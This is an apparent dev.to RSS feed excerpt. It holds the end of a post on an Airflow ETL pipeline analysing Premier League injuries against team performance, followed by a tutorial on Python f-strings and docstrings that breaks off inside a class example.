        &lt;span class="n"&gt;injuries&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ti&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;xcom_pull&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;injuries&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task_ids&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;transform_task&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="n"&gt;conn&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;cursor&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;cur&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nf"&gt;create_injury_schema&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;conn&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="nf"&gt;load_teams&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cur&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="nf"&gt;insert_matches&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cur&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;matches&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="nf"&gt;insert_player_details&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cur&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;players&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="nf"&gt;insert_player_stats&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cur&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;player_stats&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;conn&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;commit&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="nf"&gt;load_injuries_data&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;conn&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;injuries&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# Set dependencies
&lt;/span&gt;    &lt;span class="nf"&gt;extract_task&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="nf"&gt;transform_task&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="nf"&gt;load_task&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The image below shows the DAG runs, which eventually succeeded:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi2xocatybu7bhaus0kst.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi2xocatybu7bhaus0kst.png" alt="DAG runs" width="444" height="242"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Data Analysis
&lt;/h2&gt;

&lt;p&gt;Once the data is consolidated, it can be used for statistical analysis to look for a correlation between injury occurrences and team performance metrics. I was able to get team and player stats for the whole season, but the injury data covered only the few weeks before my free trial on ScrapperAPI expired, so a proper analysis of the entire season wasn't possible. With data covering the last third or so of the 2024 season, I was able to do the following analysis:&lt;/p&gt;

&lt;h3&gt;
  
  
  Frequency of injuries by team
&lt;/h3&gt;

&lt;p&gt;Purpose: Determine which teams had the most injuries&lt;br&gt;
Finding: Chelsea had the most injuries with 4, and Arsenal had the fewest with none. Man United had one, a low number compared to the other teams.&lt;/p&gt;

&lt;h3&gt;
  
  
  Injury Rate vs Win Percentage Analysis
&lt;/h3&gt;

&lt;p&gt;Purpose: Determine whether teams with more injuries perform worse&lt;br&gt;
Finding: Man United had fewer injuries than the other teams but performed worse, suggesting that injuries were not the only cause of poor performance.&lt;/p&gt;

&lt;h2&gt;
  
  
  Challenges faced while building this pipeline
&lt;/h2&gt;

&lt;h3&gt;
  
  
  a. Data extraction
&lt;/h3&gt;

&lt;p&gt;The Cloudflare CAPTCHA test prevented me from using basic Python libraries to extract injury data, so I needed a paid API for extraction. This also meant I could not get injury data spanning the entire season for proper analysis.&lt;/p&gt;

&lt;h3&gt;
  
  
  b. Data Normalization
&lt;/h3&gt;

&lt;p&gt;Since data was collected from multiple sources referencing the same players, each source used different identifiers to represent them. To ensure consistency and eliminate redundancy, I applied database normalization techniques — standardizing player identifiers, resolving data inconsistencies, and structuring the data into related tables for more efficient storage and retrieval.&lt;/p&gt;
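&lt;p&gt;One way to standardize player identifiers can be sketched as follows. This is a minimal illustration, not the pipeline's actual code: it assumes the sources differ only in case, accents, and spacing, and the function names and sample spellings are hypothetical.&lt;/p&gt;

```python
import unicodedata


def canonical_key(name):
    """Return a lowercase, accent-free, single-spaced version of name."""
    decomposed = unicodedata.normalize("NFKD", name)
    without_accents = "".join(
        ch for ch in decomposed if not unicodedata.combining(ch)
    )
    return " ".join(without_accents.lower().split())


def assign_player_ids(names):
    """Map each distinct canonical key to one integer id (hypothetical helper)."""
    ids = {}
    for name in names:
        # setdefault only assigns a new id the first time a key is seen.
        ids.setdefault(canonical_key(name), len(ids) + 1)
    return ids


# Illustrative spellings of the same players as two sources might report them.
source_names = ["Bruno Fernandes", "bruno  fernandes", "André Onana", "Andre Onana"]
player_ids = assign_player_ids(source_names)
print(player_ids)
```

&lt;p&gt;The resulting ids can then serve as the shared key that the related tables reference, so each player is stored once regardless of how a source spelled the name.&lt;/p&gt;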

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Building this pipeline was more than just a coding exercise — it was a practical test of my data engineering foundations. From web scraping and normalization to ETL automation and database design, the project taught me how data moves through every stage of an analytical workflow.&lt;br&gt;
Even with partial data, the findings challenged assumptions about Manchester United’s poor season and highlighted how data engineering enables evidence-based analysis.&lt;br&gt;
This project strengthened my grasp of ETL orchestration, workflow automation, and schema design — setting the stage for future work involving analytics dashboards and machine learning-driven insights.&lt;/p&gt;

</description>
      <category>dataengineering</category>
      <category>python</category>
      <category>data</category>
    </item>
    <item>
      <title>Writing Clear Python: A Guide to F-Strings and Docstrings</title>
      <dc:creator>James K.</dc:creator>
      <pubDate>Wed, 21 May 2025 09:34:25 +0000</pubDate>
      <link>https://dev.to/james_kariuki/writing-clear-python-a-guide-to-f-strings-and-docstrings-c49</link>
      <guid>https://dev.to/james_kariuki/writing-clear-python-a-guide-to-f-strings-and-docstrings-c49</guid>
      <description>&lt;p&gt;In Python, writing clean, maintainable, and well-documented code is not just encouraged—it’s built into the language. Two standout features that help achieve this are f-strings and docstrings.&lt;br&gt;
This article explores how these features work, why they matter, and how to use them effectively to write expressive and self-documenting Python code.&lt;/p&gt;
&lt;h2&gt;
  
  
  F-strings
&lt;/h2&gt;

&lt;p&gt;A formatted string literal, or f-string, is a string literal that is prefixed with 'f' or 'F'. These strings may contain replacement fields, which are expressions delimited by curly braces {}. It’s a shortcut for building strings with dynamic content. &lt;br&gt;
F-strings were introduced in Python 3.6. Before Python 3.6, you had two main tools for interpolating values, variables, and expressions inside string literals:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The string interpolation operator (%), or modulo operator&lt;/li&gt;
&lt;li&gt;The str.format() method&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;
  
  
  The Modulo Operator (%)
&lt;/h4&gt;

&lt;p&gt;The modulo operator (%) was the first tool for string interpolation and formatting in Python and has been in the language since the beginning. Here’s what using this operator looks like in practice:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Jane&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;age&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;25&lt;/span&gt;

&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Hello, %s! You&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;re %s years old.&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;age&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;Hello&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Jane&lt;/span&gt;&lt;span class="err"&gt;!&lt;/span&gt; &lt;span class="n"&gt;You&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;re 25 years old.
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In this example, we use a tuple of values as the right-hand operand to %. Note that the tuple holds a string and an integer. Because both fields use the %s specifier, Python converts both objects to strings.&lt;/p&gt;
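&lt;p&gt;Beyond %s, the % operator accepts other conversion specifiers, and the right-hand operand can also be a dictionary. The short sketch below shows both; the height variable is made up for illustration.&lt;/p&gt;

```python
name = "Jane"
age = 25
height = 1.6849  # illustrative value

# %s calls str() on the value, %d formats an integer,
# and %.2f rounds a float to two decimal places.
tuple_result = "%s is %d years old and %.2f m tall." % (name, age, height)

# With a dictionary, each field refers to its value by key.
dict_result = "%(name)s is %(age)d years old." % {"name": name, "age": age}

print(tuple_result)
print(dict_result)
```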

&lt;h4&gt;
  
  
  The str.format() Method
&lt;/h4&gt;

&lt;p&gt;The str.format() method is an improvement compared to the % operator because it fixes a couple of issues and supports the string formatting mini-language. With .format(), curly braces delimit the replacement fields.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Jane&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;age&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;25&lt;/span&gt;

&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Hello, {}! You&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;re {} years old.&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;age&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The example above outputs:&lt;br&gt;
"Hello, Jane! You're 25 years old."&lt;/p&gt;
&lt;h4&gt;
  
  
  F-strings
&lt;/h4&gt;

&lt;p&gt;F-strings joined the party in Python 3.6 with PEP 498. With f-strings, you can easily insert values or expressions directly into the string without much fuss. While other string literals always have a constant value, formatted strings are really expressions evaluated at run time. The parts of the string outside curly braces are treated literally, except that any doubled curly braces '{{' or '}}' are replaced with the corresponding single curly brace. A single opening curly bracket '{' marks a replacement field, which starts with a Python expression.&lt;/p&gt;
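&lt;p&gt;The brace rules described above can be seen in a small sketch. Doubled braces come out as literal braces, while a single pair wraps an expression that is evaluated when the line runs.&lt;/p&gt;

```python
name = "Jane"

# Doubled braces produce literal braces; single braces start a replacement field.
literal = f"{{name}} is replaced by {name}"

# A replacement field holds an expression, not just a variable name.
computed = f"{name} has {len(name)} letters and 2 + 3 = {2 + 3}"

print(literal)
print(computed)
```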

&lt;p&gt;In short, f-strings are a simple way to put variables or expressions into your strings without resorting to more verbose formatting methods.&lt;br&gt;
Here's a simple example of using f-strings in Python:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Jane&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;age&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;25&lt;/span&gt;

&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;My name is &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; and I am &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;age&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; years old.&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In the example, f"My name is {name} and I am {age} years old." is an f-string — a string prefixed with f that allows expressions inside curly braces {} to be evaluated and included directly in the output.&lt;br&gt;
{name} is replaced with the value "Jane".&lt;br&gt;
{age} is replaced with the value 25.&lt;br&gt;
Thus, the output is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;My&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="ow"&gt;is&lt;/span&gt; &lt;span class="n"&gt;Jane&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="n"&gt;I&lt;/span&gt; &lt;span class="n"&gt;am&lt;/span&gt; &lt;span class="mi"&gt;25&lt;/span&gt; &lt;span class="n"&gt;years&lt;/span&gt; &lt;span class="n"&gt;old&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Notice how readable and concise the string is now that we’re using the f-string syntax. You don’t need operators or methods anymore. You just embed the desired objects or expressions in your string literal using curly brackets.&lt;/p&gt;

&lt;p&gt;You can embed almost any Python expression in an f-string. This allows you to do some nifty things like the following:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Jane&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;age&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;25&lt;/span&gt;

&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Hello, &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;upper&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;! You&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;re &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;age&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; years old.&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In the example above, you embed a call to the .upper() string method in the first replacement field. Python runs the method call and inserts the uppercased name into the resulting string. The output will be:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;Hello&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;JANE&lt;/span&gt;&lt;span class="err"&gt;!&lt;/span&gt; &lt;span class="n"&gt;You&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;re 25 years old.
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;F-strings are also generally a bit faster than both the modulo operator (%) and the .format() method, which makes them a good default choice for string formatting.&lt;br&gt;
More detailed info on f-strings can be found here: &lt;a href="https://docs.python.org/3/reference/lexical_analysis.html#f-strings" rel="noopener noreferrer"&gt;https://docs.python.org/3/reference/lexical_analysis.html#f-strings&lt;/a&gt;&lt;/p&gt;
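&lt;p&gt;A rough way to check the speed difference on your own machine is the standard library's timeit module. The sketch below is only an informal comparison: the timings vary with hardware and Python version, and each call includes the small overhead of a lambda.&lt;/p&gt;

```python
import timeit

name = "Jane"
age = 25

# Three equivalent ways to build the same string.
candidates = {
    "percent": lambda: "Hello, %s! You're %s years old." % (name, age),
    "format": lambda: "Hello, {}! You're {} years old.".format(name, age),
    "f-string": lambda: f"Hello, {name}! You're {age} years old.",
}

# All three must produce identical output for the comparison to be fair.
outputs = {label: build() for label, build in candidates.items()}

# Time each approach over the same number of calls.
timings = {
    label: timeit.timeit(build, number=100_000)
    for label, build in candidates.items()
}

for label, seconds in timings.items():
    print(f"{label:10} {seconds:.4f} s")
```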
&lt;h2&gt;
  
  
  Docstrings
&lt;/h2&gt;

&lt;p&gt;A docstring is a string literal that occurs as the first statement in a module, function, class, or method definition. It is used to explain what something does and can be accessed via the __doc__ attribute. All modules should normally have docstrings, and all functions and classes exported by a module should also have docstrings. String literals occurring elsewhere in Python code may also act as documentation. However, they are not recognized by the Python bytecode compiler and are not accessible as runtime object attributes (i.e. not assigned to __doc__).&lt;/p&gt;
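&lt;p&gt;A quick sketch makes the distinction concrete. Only the string that is the first statement ends up in __doc__; a later string literal or a comment does not. The function names here are illustrative.&lt;/p&gt;

```python
def greet(name):
    """Return a greeting for name."""
    "This later string literal is evaluated and discarded."
    return f"Hello, {name}!"


def undocumented(name):
    # A comment is not a docstring, so __doc__ stays None.
    return name


print(greet.__doc__)
print(undocumented.__doc__)
```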

&lt;p&gt;Conventions for writing clear, consistent docstrings are outlined in PEP 257. They include:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Using triple quotes ("""Docstring""") even for one-liners.&lt;/li&gt;
&lt;li&gt;Starting with a summary line.&lt;/li&gt;
&lt;li&gt;Following the summary with a more detailed description (optional).&lt;/li&gt;
&lt;li&gt;Keeping the summary in the imperative mood (e.g., "Return the sum..." rather than "Returns...").&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;
  
  
  One-Line Docstrings
&lt;/h4&gt;

&lt;p&gt;Ideal for simple functions or methods, a one-line docstring should:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Be enclosed in triple double quotes (""").&lt;/li&gt;
&lt;li&gt;Fit on a single line.&lt;/li&gt;
&lt;li&gt;Begin with a capital letter and end with a period.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Example&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;y&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Return the sum of x and y.&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;y&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Multi-Line Docstrings
&lt;/h4&gt;

&lt;p&gt;Multi-line docstrings start with a one-line summary, followed by a blank line, then a detailed description. The summary should be concise enough for indexing tools and clearly separated. The entire docstring should match the indentation of the code it documents.&lt;br&gt;
A class docstring should be followed by a blank line to visually separate it from the first method. Avoid writing argument names in uppercase in running text; list each argument on its own line using its correct, case-sensitive identifier.&lt;br&gt;
Different constructs have tailored docstring needs:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Scripts: Docstrings should serve as usage/help messages, explaining syntax, arguments, and environment variables.&lt;/li&gt;
&lt;li&gt;Modules: Should list exported objects (classes, functions, etc.) with brief summaries.&lt;/li&gt;
&lt;li&gt;Functions/Methods: Must describe behavior, arguments, return values, side effects, exceptions, and constraints.&lt;/li&gt;
&lt;li&gt;Classes: Should summarize behavior, public members, and subclassing interfaces. If subclassing is involved, describe differences and use “override” or “extend” where appropriate.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Example&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;complex&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;real&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;0.0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;imag&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;0.0&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Form a complex number.

    Keyword arguments:
    real -- the real part (default 0.0)
    imag -- the imaginary part (default 0.0)
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;imag&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mf"&gt;0.0&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="n"&gt;real&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mf"&gt;0.0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;complex_zero&lt;/span&gt;
    &lt;span class="bp"&gt;...&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Comments vs Docstrings
&lt;/h4&gt;

&lt;p&gt;Comments are descriptions that help programmers better understand the intent and functionality of the program. They are completely ignored by the Python interpreter.&lt;br&gt;
As mentioned above, Python docstrings are strings used right after the definition of a function, method, class, or module. They are used to document our code.&lt;/p&gt;

&lt;p&gt;We can access these docstrings using the __doc__ attribute, for example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;Person&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
    A class to represent a person.
&lt;/span&gt;&lt;span class="gp"&gt;
    ...&lt;/span&gt;

&lt;span class="s"&gt;    Attributes
    ----------
    name : str
        first name of the person
    surname : str
        family name of the person
    age : int
        age of the person

    Methods
    -------
    info(additional=&lt;/span&gt;&lt;span class="sh"&gt;""&lt;/span&gt;&lt;span class="s"&gt;):
        Prints the person&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s name and age.
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;surname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;age&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
        Constructs all the necessary attributes for the person object.

        Parameters
        ----------
            name : str
                first name of the person
            surname : str
                family name of the person
            age : int
                age of the person
        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;

        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;surname&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;surname&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;age&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;age&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;additional&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;""&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
        Prints the person&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s name and age.

        If the argument &lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;additional&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt; is passed, then it is appended after the main info.

        Parameters
        ----------
        additional : str, optional
            More info to be displayed (default is an empty string)

        Returns
        -------
        None
        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;

